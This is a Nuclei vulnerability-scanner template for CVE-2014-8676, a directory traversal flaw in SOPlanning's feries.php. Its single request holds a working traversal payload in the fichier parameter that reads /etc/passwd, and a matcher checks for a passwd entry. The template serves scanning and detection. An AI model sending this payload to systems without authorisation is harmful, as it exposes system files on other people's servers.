nuclei-templates/cves/2014/CVE-2014-8676.yaml

37 lines
1.1 KiB
YAML

id: CVE-2014-8676
info:
name: Simple Online Planning Tool <1.3.2 - Local File Inclusion
author: 0x_Akoko
severity: medium
description: |
SOPlanning <1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter.
reference:
- https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
- https://www.exploit-db.com/exploits/37604/
- http://seclists.org/fulldisclosure/2015/Jul/44
- https://nvd.nist.gov/vuln/detail/CVE-2014-8676
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2014-8676
cwe-id: CWE-22
tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by cs on 2022/09/09